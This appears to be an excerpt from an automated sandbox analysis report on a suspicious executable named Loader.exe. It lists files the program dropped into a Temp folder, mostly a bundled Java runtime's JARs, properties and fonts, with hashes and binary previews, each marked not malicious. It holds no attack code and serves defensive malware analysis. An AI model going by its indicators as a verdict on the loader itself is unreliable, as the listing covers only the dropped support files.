                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.9328569913001905
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:49152:fBkB7GOrPDSz0fHaIU1KDWtHkLs0amlyYu:fBkoOruSHa/4y/FmA
                                                                                                                                                                                                                                                                                                              MD5:F3E3E7769994C69DFF6E35EF938443CA
                                                                                                                                                                                                                                                                                                              SHA1:758F42C0A03121AD980DC98BE82DCAF790679E79
                                                                                                                                                                                                                                                                                                              SHA-256:CF0268FF39D19876BD42BF59E2CE93BB9AA57E5EE98C212BAE0184BD87F2D35A
                                                                                                                                                                                                                                                                                                              SHA-512:AB4801E8538B9B84124D2B8C36E64232F16DA686C5FA565C5DE2091C910806A850464F5CCC79C9320DF6F8CB943633FC38FEA63F9E0593A44E3541F15F126951
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........o..H................META-INF/......PK..............PK........o..H................META-INF/MANIFEST.MFm....0.E.&...:..q.0.....W.g(>Z.v..E4,...{o..>1&y...w.0JsV....<..A..M.bs.. ......F|.Y... .Bt.K9...N%.).s.D.qVC.......c?......'..B,k...&.......i?^0...o...PK..\K:x........PK........i..H............6...jdk/internal/dynalink/beans/AbstractJavaLinker$1.class.S.N.Q..N[.mY.".....T......7.%....A...t..n..m........k51.....2..H.51....o..|..9?~~;....9..J.Y.g...5......M%.4......z....=..v.OF"..7.#....-.e......nU...G^ K.a/.BF.....y.....*C.C.^..!.R.eH.....j....aK.M...3].....=..;'.;]j*..>C....#*.:..Z.(.N...JvEX.I.e..A..."j...C....t.C.q..:..>.J1}...z`..v...[.. .QTa..kXeX..'.1O.c..1...x..W..a.....3.Gl.VG8.C.tE5P...rN.&.v.....F.V.{.say.0^~m.....e....VW.B..x.h..u.i.K..F..j.[;;..Z.z.^f.8.q~.nR.n....Q.2..$.)B.$..|.;.....'.&. .j|@.E....FP#....A-..."...b.n.".H/c..Ho..s.I./.X..p...}..]F....SP.L.u."@..$o.9.b.'.!.;X~6..PK..]./.<...H...PK........i..H............K...jdk/internal

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\ext\sunec.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):39771
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.92713480980539
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:ah0EOq/w9b3jpSo40ROLB2CUrQbNVkJBtw6pcZWztpQeA4Uz7NWnZVNB3gX083/z:aJOyw9b3joo4hLB2CUr2yBw6pcMtpS44
                                                                                                                                                                                                                                                                                                              MD5:A269905BBB9F7D02BAA24A756E7B09D7
                                                                                                                                                                                                                                                                                                              SHA1:82A0F9C5CBC2B79BDB6CFE80487691E232B26F9C
                                                                                                                                                                                                                                                                                                              SHA-256:E2787698D746DC25C24D3BE0FA751CEA6267F68B4E972CFC3DF4B4EAC8046245
                                                                                                                                                                                                                                                                                                              SHA-512:496841CF49E2BF4EB146632F7D1F09EFA8F38AE99B93081AF4297A7D8412B444B9F066358F0C110D33FEA6AE60458355271D8FDCD9854C02EFB2023AF5F661F6
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK.........r.F................META-INF/MANIFEST.MF..I..H....Q..C.f.X..*b......lz..$..dK6..7U....N.5...... .GT.......[.{a...8#(FI......%Ao==...U%%.QOIjL....'.o../..q.q.!....k..)}..4...@J..~\....@..z0._.*....L....=..z.=?)..%... n......HoY.>?........]....Nz..,..c./........6$.@....1.2.X...`:G.j.S..IP.-X...0..8jk...|.....YF.b..u.9...F\.j......y.*Q.'..2.i.S.D...z.j...a..a..L.o..+v. .!.h..8H...d..R.d1a...A.9........zC..Z_.p.`...).t. ...q.1.......\...RS."..11.C.Y..I...J.(.(x.m..N..('[..C.o....H..].<#.%....CZ....[....Y......g..=.2...........I....qm.-....(..BZF.r8=.C(F...I.."...$W....]...9..0b......]...5.M.....`"."k...k....T\....WZQ.>.8..KF..g[Y.c5.s...U..-c....!v..$.rG......1T....bb.s>..R.w....&8.*NX@o+...~,K..2..yI..._f^.l@..|.....U...^...#.P.u!.#..g@/d.<.../..:..V.[.6B.TG....>.D..R\.k....E.E.O4K..Z....f.,..f......hRW...) X......\M.#!)..H..b..f...w..R....w.=.........PC.#...K..|..d.S..Ms.]4q.....c..f......}.NF^.7d...|.*..^\n.l.D..V......

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\ext\sunjce_provider.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):279427
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.90277234368113
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:E/Ieog0SgEOU8pqHbQpr16jWun5bT1aReAaTFMzpx2Xcpll+PrA3YaRBlLi:E/m9eJsppCLJTURe9TFMrQ0fkUK
                                                                                                                                                                                                                                                                                                              MD5:B04074A9FC78DC1409168E1E2D139647
                                                                                                                                                                                                                                                                                                              SHA1:54182C904A48364FC572E3A2631DF14823C29CEF
                                                                                                                                                                                                                                                                                                              SHA-256:BFAD3FB11E7115AAF34719488551BF3205B2FAFFB38681C7F6BDAD19BB7568C2
                                                                                                                                                                                                                                                                                                              SHA-512:E97CA3D53E867E957BF467688F83C53B2FD6FF1EA001B19F03A23096581DC8ADCEC7C1403D164D063B1A437E4BF6FA98E1543626849D4E17E31156CB012F9599
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........aZ.H................META-INF/MANIFEST.MF.|I..V..".?xP...p.#..7.G D.N.......~...)....ic.;..[.k.../3...5.5........O....x....6c4>...].u....h.~2.f,n.O|3.}.|<..._}..o........K..Z.=.$m....>...'....O?...G.>&..)no.......Z=...k..~...O.z....c.|(..9.=..|....q.vc....}..i.3.~.}x...~.?.+..._...}.......|..,.,..&`.s..=.....h...%.g.'~..i......p.;A..B..99{....E..k........)......^IW!.._....+..)....d._0...s......v..R.c.*]..0.C..Z}.....j..O%.I.....J.%..).Q..=..0.J.J...A......%T...$..h.#.N%N.e.ne...=DV.......+.....(..f...yn.P..-...f.ON..d=8-....B.^......S.+........$V`..uz....US..h.8.4^Y-;4.M.+i...dw.9.x..k.]...\u..j{<.....r.....y}.E.....X.~%....zF;.<....+-...X.I.I..]..N`.2.G....c~..J.r.o@..My.(.H,...b.e...5'e./...b;D~.%....};....J....1k5CrO..6....n.....>.t..0a.......,.J./;.q.y...w...J.t&s.2.sYk....1...5..._x.....Q..M.J...N.y3{....R..~.F..V......'z...{|..j5..../.;.NCGG\.....!M...Pfe/l..).zL..9.4....?..o.....}.F..M....~.L.q.] ..x.v..d.]G[...q$.E.o...r.(..

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\ext\sunmscapi.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):32699
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.878192531974338
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:iLy1giOqjU0jNVmOTuDQJD/RpAczsikFfg0y+7aBTS73dyPoXvvKv2PtvHubyKhi:i4giOaU0jNVmOCADZpVsiUf3yua5S7t7
                                                                                                                                                                                                                                                                                                              MD5:2249EAC4F859C7BC578AFD2F7B771249
                                                                                                                                                                                                                                                                                                              SHA1:76BA0E08C6B3DF9FB1551F00189323DAC8FC818C
                                                                                                                                                                                                                                                                                                              SHA-256:A0719CAE8271F918C8613FEB92A7591D0A6E7D04266F62144B2EAB7844D00C75
                                                                                                                                                                                                                                                                                                              SHA-512:DB5415BC542F4910166163F9BA34BC33AF1D114A73D852B143B2C3E28F59270827006693D6DF460523E26516CAB351D2EE3F944D715AE86CD12D926D09F92454
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........)..H................META-INF/MANIFEST.MF....X.........ad2....@..%E..M.^.x.. O_dW.5Qi..8.....).aY=.!.Q....g..AM..&0....d.*./#..yM+......g.[.O..$....I?>X9..G......h.]...".y....do.O..2.Y.\^...}+....p2..u.]...V0}....&..a.C...-.....n.....M...M.F..,.....v@...>>|..["J...U7")..#b.oV.a...l.g..e.s..L.D..={.-gLEt.....!/... q....z.J...0.2e...=.....[]{..N...1....Z.....2...I.k...Sy..Qm...{....;.On..!.@..S.IZ..=......Lo.N4..|.j...!.l..G..}.Q....u....ADh.z.w.-..@%.@...!.".R.nHE.P]..J!..E.9Sw.LM7.&...[v..~.P...bp;.....:id.e..o.h..8.C....l...70..].gp..7.<.P.....Zj.....M......-.(@~...M^.....asJ.Y.1.e...(qW..h.c.Iu...-.A..?.5.Ex.S.oc6.).Qkr..+....|..._..H..!7..hs.r.;.z=.....*#.c....6...O+q.I.....|.4.V....Y.T.....4XO..4.>..1.$h..lu..l0..?...w.......o.u....6..)BG'..f......d.v...........<.i..Bj..d..L.....G.r@1.....0..d......'...........*.rK....5x..8.V..9(..Y.`'.k.N....3b.rx.p..c...M_j%..U.z.|Y.1\....d...-I.<g........-.h.*.F...me.F..p.c.o..

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\ext\sunpkcs11.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):250826
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.951088517189604
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:dKtThM4XbBG7v3jUAbE0MEIynrI25ENN/kv1Pv:dKphM4X1G7PjlbE0MxHLbC
                                                                                                                                                                                                                                                                                                              MD5:2E33D8F1FBEB9239C6FFC0D36DE772D1
                                                                                                                                                                                                                                                                                                              SHA1:3F881E3B34693A96CD3D9E20D6AEABAE98757359
                                                                                                                                                                                                                                                                                                              SHA-256:938C497E97E893D0B9325522475AD9FB2C365A4AF832ED180B570C3E4E6FD559
                                                                                                                                                                                                                                                                                                              SHA-512:DB9A5B0F269BBFC9CB712D8BF170414D649CD72F0DEECCDC3A4D742430E2E29E203F7E462D2DF8F9EC2C82723A8A56FF8FD409CDCBE66547C798B15370B8DB65
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........mS.F................META-INF/MANIFEST.MF.{.........3.. l@ .G...D.#49A/...........Z.jTUj.{g.\.r..4y...n2.y.........s.UI.4S0=_...*....,..sn..N.p..m..C.....F|{..%Q.....m.v...6.Q.|a.k.?....}...../Q[.6..?.....*..v..P....>..O.:%.E..........o.uS..O..S..Jo....}../.........z.b.....?}_..%pL.y....h.aP.a...1....)..$..IH....v.-..q|..D.z8b..y.<...x..M.K]b=.+.0nSt.co(.-.............C.u..2.W..3...+.....9.d.......L..</..P..z+n..JR;V..K....>...D.....<.....=..+e....>L..`......g.....Os..Ly..T..a.`.}.......Z...R..S...c..z......x.U..)...J.........e..=rr..^K.....hY2.U....e........N.9..r).#!V[..`...B.......CW.}o.q......u7..h0?6.P.14N.-J.\.!u`....H..l...1'J=[.+.-.....X.9.@.......a{C.).Z..P(W.}O...%./..XG=...^..N.enV.F<..oW.|....CJ.....\x..g;v.L.Wf...N.#..*..!.L..:.MD.Vy.z.0.L..72...|.=..eB6(z....#:8D..ig....U....SO.t......0_...>S...}.L.ze....=...k&.[...U^p.$...(........m.z.....~.F..........h......z3<LO.y..4.......w.3.......,W8(..3UF.R.....J)J..q.....Z.d.;

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\ext\zipfs.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):68923
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.950933538093809
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:YNSe2yN5DbD630l1MIeEfqjGWb2LU2j6rnbisZp/u:Ne2yNhDVl1leEP/qn2sZk
                                                                                                                                                                                                                                                                                                              MD5:4D507E8D7BBF5ECEC8791CBA57B1CE17
                                                                                                                                                                                                                                                                                                              SHA1:A66C0D4648A06B9078252D090D596C91C591AA50
                                                                                                                                                                                                                                                                                                              SHA-256:C3993DF765AFF1068A656B28A7A4EDFFE7710AE3B6AA2EA056A6F9C3EDBDC210
                                                                                                                                                                                                                                                                                                              SHA-512:21B4E729B16947B31657DC5F7F5C75DCDA9F94B4A0ED414E11A6D02951137AC266D605855DDDA7C21BE0200EA07530962D1ECE2FAE009EAE5F2A1A365195C995
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........b..H................META-INF/......PK..............PK........b..H................META-INF/MANIFEST.MF..;..0...@...uhI.J6-...E.U..-..(I,..m.|Up=..;.B.:.19...Y.Y*8+M.....p,m...F.....?..zRQ..........l....C..]....cO..T.......ds...(.9,...[.~...;.....>....Y.*T6)4. .3..PK.../.?....L...PK........I..H............-...com/sun/nio/zipfs/JarFileSystemProvider.class.U]S.U.~NH.a.@..B.\.!.$.U[.X..J..H..G...$,Mv.....z....9...........Z.d..a.1.y...<..s.y...~....x&c......q..B.`B.......'b.4...'e.1%......i!f../aV.L......B,.XD..KX.......V..^..@....`SD..`[.C._0.'..p.2.EF...SV.3t-.&OW.Yn....i....vx..=..]}O.J.Y.2.m..q.Tmc.Z.....H.arW[[I.7.L...F.k.E&...../.z.J...,U. QD...%....v...".+s.-f.....e..3....."..bvu[..b..Ag.<I7U*.^J..j....~.W\.2....i.j..1C7..:..U.QM.UG.d.c`4.8.Pf..MA.E.;0...1.r..bX..$l>h..%..,h.*..."^=m.90]}.T.}'.&...B;m.-.9.\T....x.p.laD.....#..U.r..P..o...(.a.....`.E.....*1..4-......fT......H.*kN..1....r.Z"7.J+d....B5.'U...e.).!...rt...^.p3..k.8.j.:..k5T....".

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\flavormap.properties

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4005
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.909684349537555
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:5Th0S7zmtRUioj/DUXBZZjM8mcWoe+YfVktH:5h0Iz6Uioj/YXLZjnmdoeDktH
                                                                                                                                                                                                                                                                                                              MD5:B0CE9F297D3FEC6325C0C784072908F1
                                                                                                                                                                                                                                                                                                              SHA1:DD778A0E5417B9B97187215FFC66D4C14F95FEF0
                                                                                                                                                                                                                                                                                                              SHA-256:6DA00C1CBE02909DCD6A75DA51D25DBF49BFD1D779C0B8E57B12E757229FC4A8
                                                                                                                                                                                                                                                                                                              SHA-512:4C774BCB9ADE996569C86DD46B3BDB046771AD1BCF9AABB9DB86854C83E18015CBE5DF73DA86EE98E26BA0393F548B1CC09DE60BDA4248EACC4FC833E23B8AB4
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..# This properties file is used to initialize the default..# java.awt.datatransfer.SystemFlavorMap. It contains the Win32 platform-..# specific, default mappings between common Win32 Clipboard atoms and platform-..# independent MIME type strings, which will be converted into..# java.awt.datatransfer.DataFlavors...#..# These default mappings may be augmented by specifying the..#..# AWT.DnD.flavorMapFileURL ..#..# property in the appropriate awt.properties file. The specified properties URL..# will be loaded into the SystemFlavorMap...#..# The standard format is:..#..# <native>=<MIME type>..#..# <native> should be a string identifier that the native platform will..# recognize as a valid data format. <MIME type> should specify both a MIME..# primary type and a MIME subtype separated by a '/'. The MIME type may include..# parameters, where each parameter is a key/value pair separated by '=', and..# where each parameter to the MIME type is separated by a ';'...#..# Because SystemFla

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\fontconfig.bfc

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:raw G3 (Group 3) FAX
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3670
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.40570512634857
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:IRsY7hGbXWvaBKvKY5csW4BxciETBT5Bxrws+LW/B56JF:At/vaBKvKY5fxci8jMWY
                                                                                                                                                                                                                                                                                                              MD5:E0E5428560288E685DBFFC0D2776D4A6
                                                                                                                                                                                                                                                                                                              SHA1:2AE70624762C163C8A1533F724AA5A511D8B208E
                                                                                                                                                                                                                                                                                                              SHA-256:AAE23ACC42F217A63D675F930D077939765B97E9C528B5659842515CA975111F
                                                                                                                                                                                                                                                                                                              SHA-512:C726CC2898399579AFA70ACACE86BEC4369D4541112243E51721568B4D25DCC6C66FA64AC475AFF9BA9DE07A630B24A9F221FA00426AD36845203BA809219E3C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:...%.........6.Y.j.{.........+...........6.=.:.-.9.;.<.3...0.4./.2.8.1.5.7......................................................................................................................................... ............... .........................................................................................................................D.C.I.F.A.G.E.B.?.@.>.H...........................................................................................!.".#.$.%.&.'.(.).*.+.+.+.+.+.J.M.U.^.f.e.X.W.d.V.R.\._.`.a.Y.O.Z.P.S.K.Q.N.[.c.L.T.].b.g.j.}...r.q.l.{.z.....p.o.|.s.k.w.~.t.x.v.y.........h.u.i.m.........n.................................................................................................................................................!......."........... .................#.(.-.2.7.<.A.F.K.P.U.[.a.g.m.s.y......................................................... .(.5.;.H.U.d.v...............................*.4.?.H.T.].i.s.~.............................".7.@.J.R.R.^.i

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\fontconfig.properties.src

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):10779
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.217016051711063
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:Pj2TlKg7RzPc/mOHUFN5HX/rS8QbWZjjfVpMbtxp8lcR9NN:Pj6Y8NcFzXbWZjj9pSMlcz
                                                                                                                                                                                                                                                                                                              MD5:0C1DB7410938A3634BD9928BA2F284CB
                                                                                                                                                                                                                                                                                                              SHA1:7EE31F22136E73A2A3D0AAB279199778BAAB06F5
                                                                                                                                                                                                                                                                                                              SHA-256:818A718788E5506EBB84F26DE82B6C60E08861876400E9ED3931346174D5D7FB
                                                                                                                                                                                                                                                                                                              SHA-512:EE267E59564A077713856A307382D40D0D8DF8E7EC2EF930723B076F5E38446D3B2600D10AC192262F9A3A86D9973CF13A9E90D180818C05A6C7896A5BD7AD19
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..# ..# Copyright (c) 2003, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....# Version....version=1....# Component Font Mappings....allfonts.chinese-ms936=SimSun..allfonts.chinese-ms936-extb=SimSun-ExtB..allfonts.chinese-gb18030=SimSun-18030..allfonts.chinese-gb18030-extb=SimSun-ExtB..allfonts.chinese-hkscs=MingLiU_HKSCS..allfonts.chinese-ms950-extb=MingLiU-ExtB..allfonts.devanagari=Mangal..allfonts.dingbats=Wingdings..allfonts.lucida=Lucida Sans Regular..allfonts.symbol=Symbol..allfonts.thai=Lucida Sans Regular..allfonts.georgian=Sylfaen....serif.plain.alphabetic=Times New Roman..serif.plain.chinese-ms950=MingLiU..serif.plain.chinese-ms950-extb=MingLiU-ExtB..serif.plain.hebrew=David..serif.plain.japanese=MS Mincho..serif.plain.korean=Batang....serif.bold.alphabetic=Times New Roman Bold..serif.bold.chinese-ms950=PMingLiU..serif.bold.chinese-ms9

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\fonts\LucidaBrightDemiBold.ttf

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,422.Lucida BrightDemiboldLucida Bright Dem
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):75144
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.849420541001734
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:H8Jwt1GIlZ6l0/9tRWhc0x/YxvsTjyIDXCrGU/tlDaKAgKrTLznvzDJIZmjFA0zG:Mwtze9xQcQ/LDaKAgK3LLvzFogbFt5WD
                                                                                                                                                                                                                                                                                                              MD5:AF0C5C24EF340AEA5CCAC002177E5C09
                                                                                                                                                                                                                                                                                                              SHA1:B5C97F985639E19A3B712193EE48B55DDA581FD1
                                                                                                                                                                                                                                                                                                              SHA-256:72CEE3E6DF72AD577AF49C59DCA2D0541060F95A881845950595E5614C486244
                                                                                                                                                                                                                                                                                                              SHA-512:6CE87441E223543394B7242AC0CB63505888B503EC071BBF7DB857B5C935B855719B818090305E17C1197DE882CCC90612FB1E0A0E5D2731F264C663EB8DA3F9
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:...........pLTSH$....#.....OS/2p.{........Vcmap.U.z...T...jcvt 8.E.........fpgm..1.........glyf@>.7...l....hdmx..(:...t..1.head.?....T...6hhea.U........$hmtx..ys...... loca..\4........maxp.8......... name..#.........postM.IA.......prepbM.h.......W.............).......).....d. ............................B&H.. . .3.D.\...... ................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~......................................................................................................P...T.@.....~.............&.. . . . . " & 0 : D t .!"!&"."."."."."."+"H"`"e%................3..... .............&.. . . . . & 0 9 D t .!"!&"."."."."."."+"H"`"d%................3.........W.......M...d...............1.....j.y........t.q._./.0.......v.t.r.p.g.T.....R..........................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\fonts\LucidaBrightDemiItalic.ttf

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc.Lucida BrightDemibold ItalicLucida Bright Demibold Itali
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):75124
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.805969666701276
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:lww80sTGzcKHwxWL0T+qHi/sbA06PoNORsr5sOnD0OyuusGa7bs4J:lwL0i97WL0T+qHA9cOR05FD0Oyup74w
                                                                                                                                                                                                                                                                                                              MD5:793AE1AB32085C8DE36541BB6B30DA7C
                                                                                                                                                                                                                                                                                                              SHA1:1FD1F757FEBF3E5F5FBB7FBF7A56587A40D57DE7
                                                                                                                                                                                                                                                                                                              SHA-256:895C5262CDB6297C13725515F849ED70609DBD7C49974A382E8BBFE4A3D75F8C
                                                                                                                                                                                                                                                                                                              SHA-512:A92ADDD0163F6D81C3AEABD63FF5C293E71A323F4AEDFB404F6F1CDE7F84C2A995A30DFEC84A9CAF8FFAF8E274EDD0D7822E6AABB2B0608696A360CABFC866C6
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:...........pLTSH.....#.....OS/2k.{........Vcmap.U.z...T...jcvt =jC.........fpgm..1.........glyf.......h...Jhdmx.......`..1.head..X.......6hhea...;.......$hmtx.b......... loca..\....0....maxp...:...D... name .7]...d....postM..A........prep.C.f....................).......).....d. ............................B&H..!. .3.D.\...... ................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~......................................................................................................P...T.@.....~.............&.. . . . . " & 0 : D t .!"!&"."."."."."."+"H"`"e%................3..... .............&.. . . . . & 0 9 D t .!"!&"."."."."."."+"H"`"d%................3.........W.......M...d...............1.....j.y........t.q._./.0.......v.t.r.p.g.T.....R..........................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\fonts\LucidaBrightItalic.ttf

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,773.Lucida BrightItalicLucida Bright Itali
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):80856
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.821405620058844
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:jw9ESkPFybxWj1V7zbPUoOPjp85rFqXpLboVklDNTc2Wt:jwZO0xWPTU7l85rFYpLbott
                                                                                                                                                                                                                                                                                                              MD5:4D666869C97CDB9E1381A393FFE50A3A
                                                                                                                                                                                                                                                                                                              SHA1:AA5C037865C563726ECD63D61CA26443589BE425
                                                                                                                                                                                                                                                                                                              SHA-256:D68819A70B60FF68CA945EF5AD358C31829E43EC25024A99D17174C626575E06
                                                                                                                                                                                                                                                                                                              SHA-512:1D1F61E371E4A667C90C2CE315024AE6168E47FE8A5C02244DBF3DF26E8AC79F2355AC7E36D4A81D82C52149197892DAED1B4C19241575256BB4541F8B126AE2
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:...........pLTSH...2..:L....OS/2p.|y.......Vcmap.U.z...T...jcvt F.;.........fpgm..1.........glyf.}.....@....hdmx?..p......1.head.A![.......6hhea.......P...$hmtx3..9...t... loca6..........maxp.......... name...p.......~postM..A...H....prep.......................).......).6...d. ............................B&H.... .3.D.\...... ................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{|}~......................................................................................................P...T.@.....~.............&.. . . . . " & 0 : D t .!"!&"."."."."."."+"H"`"e%................3..... .............&.. . . . . & 0 9 D t .!"!&"."."."."."."+"H"`"d%................3.........W.......M...d...............1.....j.y........t.q._./.0.......v.t.r.p.g.T.....R..........................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\fonts\LucidaBrightRegular.ttf

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
